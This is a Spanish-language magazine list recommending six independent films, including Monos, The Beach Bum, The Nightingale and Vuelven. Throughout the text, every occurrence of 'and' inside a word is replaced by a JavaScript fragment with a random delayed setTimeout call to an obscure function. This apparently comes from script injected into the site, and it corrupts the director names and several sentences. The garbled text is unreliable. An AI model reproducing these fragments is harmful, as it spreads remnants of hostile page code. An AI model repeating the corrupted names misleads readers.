6 Películas que no puedes dejar de ver

    6 Películas que no puedes dejar de ver

    Fuera del radar.

    Autor: Elizabeth Rivera 17 febrero, 2020


    FOTO: Cortesía distribuidora

     

    Lejos de los blockbusters, existen varias producciones que valen muchísimo la pena ver.

     

    Dedícale un fin de semana a ponerte al corriente con el cine que tiene mucho que decir y más por explorar.

     

     

    Monos

     

    Dirección: Alejandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andro Landom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes

    Una cinta pesadillesca que ha sido comparada con Apocalypse Now. Dirigida por el cineasta ecuatoriano-colombiano, Alejandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andro Landom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes, la cinta narra el secuestro de una ciudadana norteamericana por un tipo de secta juvenil acampada en una remota montaña en Colombia. Poco a poco la historia se va convirtiendo en un verdadero caos. Realmente imperdible.

     

     

     

    The Beach Bum

     

    Dirección: Harmony Korine

    Este es el papel para el que Matthew McConaughey nació para interpretar. Con el perfecto estilo cinematográfico de Korine, podrás acompañar a Moondog en esta alucinante historia de excesos, poemas y una de las mejores actuaciones de McConaughey. Este film es alucinante, perturbador y gracioso.

     

     

     

    The Nightingale

     

    Dirección: Jennifer Kent

    Tal vez una de las películas con una de las escenas más enloquecedoras del año. Sin duda, que no es para cualquiera pero que abre los ojos a la realidad de las colonizaciones de los pueblos originarios y de los presos de guerra. Una historia de dolor, venganza y del encuentro de una amistad donde menos se espera.

     

     

    Her Smell

     

     

    Dirección: Alex Ross Perry

    Si no has visto esta película, no has visto una de la mejores y más crudas interpretaciones de Elisabeth Moss. La cinta sigue la vida de la líder de una bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda de punk que excede sus propios límites hasta encontrarse con su demonio interno. La actuación de Moss durante todo el film es tremendamente atrapante y por momentos el espectador siente ser parte de ese mundo que está a punto de colapsar.

     

     

     

    Vuelven

     

    Dirección: Issa López

    Esta cinta mexicana parece en un principio que va a caer en el cliché del cine mexicano, pero rápidamente se recupera mostrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una historia realmente estremecedora sobre la realidad de los niños en nuestro país que quedan huérfanos como consecuencia de la violencia. Con actuaciones infantiles sorprendentes y que te dejan con la sangre helada, esta película es una que no debes dejar de ver.

     

     

     

    Las niñas bien

     

    Dirección: Alejandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andra Márquez Abella

    La actuación de Ilse Salas es realmente impecable. La historia narra la vida de Sofía, una mujer completamente frívola, con intereses que se centran en presumir a sus amistades, comprar, viajar y el tenis. Sin saberlo, una inmensa crisis económica la golpeará y perderá su vida de princesa perfecta. La cinta hace una fuerte crítica a la burguesía mexicana, con música y fotografía impecables.

     

     

     

     

    Estas son las películas que no te puedes perder este mes, AGENDA: ESTRENOS DE FEBRERO

     

     

     

    Temas relacionados con esta nota: , , , ,

Fuera del radar.